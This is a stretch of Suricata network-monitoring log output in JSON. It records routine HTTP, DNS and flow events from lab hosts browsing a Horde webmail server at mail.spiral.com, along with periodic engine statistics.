{"timestamp":"2020-02-29T00:14:22.000276+0000","event_type":"stats","stats":{"uptime":14514,"capture":{"kernel_packets":135627,"kernel_drops":0},"decoder":{"pkts":135632,"bytes":93404337,"invalid":187,"ipv4":134129,"ipv6":8,"ethernet":135632,"raw":0,"null":0,"sll":0,"tcp":128805,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1816,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2760,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21817,"memcap_state":0,"memcap_global":0},"http":{"memuse":35589,"memcap":0}}} 
{"timestamp":"2020-02-29T00:14:25.000341+0000","flow_id":875772497513137,"event_type":"flow","src_ip":"192.168.10.81","src_port":52752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1107,"start":"2020-02-29T00:13:18.871089+0000","end":"2020-02-29T00:13:24.094914+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:28.540604+0000","flow_id":645029679087548,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5997,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:28.697243+0000","flow_id":645029679087548,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51842,"proto":"UDP","dns":{"type":"answer","id":5997,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:28.697243+0000","flow_id":645029679087548,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51842,"proto":"UDP","dns":{"type":"answer","id":5997,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:28.779172+0000","flow_id":1080320319612926,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34828,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=CzzvouuXL90PtKLh7taEoDK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu 
Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8792}} {"timestamp":"2020-02-29T00:14:29.000160+0000","event_type":"stats","stats":{"uptime":14521,"capture":{"kernel_packets":135627,"kernel_drops":0},"decoder":{"pkts":135632,"bytes":93404337,"invalid":187,"ipv4":134129,"ipv6":8,"ethernet":135632,"raw":0,"null":0,"sll":0,"tcp":128805,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1816,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2761,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22148,"memcap_state":0,"memcap_global":0},"http":{"memuse":86225,"memcap":0}}} 
{"timestamp":"2020-02-29T00:14:30.000335+0000","flow_id":1016531461094710,"event_type":"flow","src_ip":"192.168.10.130","src_port":34818,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1165,"bytes_toclient":643,"start":"2020-02-29T00:13:24.736566+0000","end":"2020-02-29T00:13:29.882017+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:33.779815+0000","flow_id":1080320319612926,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34828,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=CzzvouuXL90PtKLh7taEoDK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8792},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":35365,"tx_id":0}} {"timestamp":"2020-02-29T00:14:34.700227+0000","flow_id":959704753418051,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50181,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:14:34.701748+0000","flow_id":658082085123380,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33640,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36121,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:34.808864+0000","flow_id":959704753418051,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39423,"proto":"UDP","dns":{"type":"answer","id":50181,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:34.808864+0000","flow_id":959704753418051,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39423,"proto":"UDP","dns":{"type":"answer","id":50181,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:34.809817+0000","flow_id":658082085123380,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33640,"proto":"UDP","dns":{"type":"answer","id":36121,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:34.809817+0000","flow_id":658082085123380,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33640,"proto":"UDP","dns":{"type":"answer","id":36121,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:34.872848+0000","flow_id":54888288126643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752}} {"timestamp":"2020-02-29T00:14:34.914303+0000","flow_id":512302305152088,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34830,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=CzzvouuXL90PtKLh7taEoDK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:14:34.924308+0000","flow_id":209077614025364,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45522,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44440,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:35.033032+0000","flow_id":209077614025364,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45522,"proto":"UDP","dns":{"type":"answer","id":44440,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:35.033032+0000","flow_id":209077614025364,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45522,"proto":"UDP","dns":{"type":"answer","id":44440,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:14:36.000132+0000","event_type":"stats","stats":{"uptime":14528,"capture":{"kernel_packets":135658,"kernel_drops":0},"decoder":{"pkts":135661,"bytes":93416146,"invalid":187,"ipv4":134156,"ipv6":8,"ethernet":135661,"raw":0,"null":0,"sll":0,"tcp":128830,"udp":5124,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2778,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2794,"synack":2785,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1817,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2341,"failed_udp":112},"tx":{"http":4673,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2421}},"flow_mgr":{"closed_pruned":2762,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23140,"memcap_state":0,"memcap_global":0},"http":{"memuse":53758,"memcap":0}}} 
{"timestamp":"2020-02-29T00:14:37.000629+0000","flow_id":1477849603888713,"event_type":"flow","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1912,"bytes_toclient":6507,"start":"2020-02-29T00:13:31.382537+0000","end":"2020-02-29T00:13:36.778747+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:39.874014+0000","flow_id":54888288126643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52756,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:14:39.946436+0000","flow_id":479196697555204,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45154,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12066,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:40.054421+0000","flow_id":479196697555204,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45154,"proto":"UDP","dns":{"type":"answer","id":12066,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:14:40.054421+0000","flow_id":479196697555204,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45154,"proto":"UDP","dns":{"type":"answer","id":12066,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:40.178979+0000","flow_id":1209336842897935,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34832,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6755}} {"timestamp":"2020-02-29T00:14:42.000716+0000","flow_id":653855817992358,"event_type":"flow","src_ip":"192.168.10.122","src_port":49092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:40.919718+0000","end":"2020-02-29T00:09:41.028314+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:14:43.000194+0000","event_type":"stats","stats":{"uptime":14535,"capture":{"kernel_packets":135716,"kernel_drops":0},"decoder":{"pkts":135727,"bytes":93446988,"invalid":188,"ipv4":134222,"ipv6":8,"ethernet":135727,"raw":0,"null":0,"sll":0,"tcp":128887,"udp":5132,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2781,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2797,"synack":2788,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1820,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2345,"failed_udp":112},"tx":{"http":4676,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2425}},"flow_mgr":{"closed_pruned":2763,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23140,"memcap_state":0,"memcap_global":0},"http":{"memuse":53816,"memcap":0}}} 
{"timestamp":"2020-02-29T00:14:44.210095+0000","flow_id":1926025151001775,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47129,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17709,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:44.318670+0000","flow_id":1926025151001775,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47129,"proto":"UDP","dns":{"type":"answer","id":17709,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:44.318670+0000","flow_id":1926025151001775,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47129,"proto":"UDP","dns":{"type":"answer","id":17709,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:44.338503+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} 
{"timestamp":"2020-02-29T00:14:44.338503+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":18,"tx_id":0}} {"timestamp":"2020-02-29T00:14:45.000745+0000","flow_id":1943479878474362,"event_type":"flow","src_ip":"192.168.10.122","src_port":41241,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:44.645754+0000","end":"2020-02-29T00:09:44.754265+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:45.179858+0000","flow_id":1209336842897935,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34832,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6755},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":33151,"tx_id":0}} 
{"timestamp":"2020-02-29T00:14:46.043430+0000","flow_id":345417056692646,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41179,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41844,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:46.152344+0000","flow_id":345417056692646,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41179,"proto":"UDP","dns":{"type":"answer","id":41844,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:46.152344+0000","flow_id":345417056692646,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41179,"proto":"UDP","dns":{"type":"answer","id":41844,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:46.216976+0000","flow_id":1918758066486106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34834,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3979}} 
{"timestamp":"2020-02-29T00:14:47.000556+0000","flow_id":489251210174079,"event_type":"flow","src_ip":"192.168.10.130","src_port":34814,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":1295,"bytes_toclient":8193,"start":"2020-02-29T00:13:10.761471+0000","end":"2020-02-29T00:13:46.260707+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:49.035557+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52758,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:14:49.044164+0000","flow_id":7712368340100,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44069,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15118,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:49.152103+0000","flow_id":7712368340100,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44069,"proto":"UDP","dns":{"type":"answer","id":15118,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:14:49.152103+0000","flow_id":7712368340100,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44069,"proto":"UDP","dns":{"type":"answer","id":15118,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:49.301564+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:14:49.301564+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":198,"tx_id":1}} 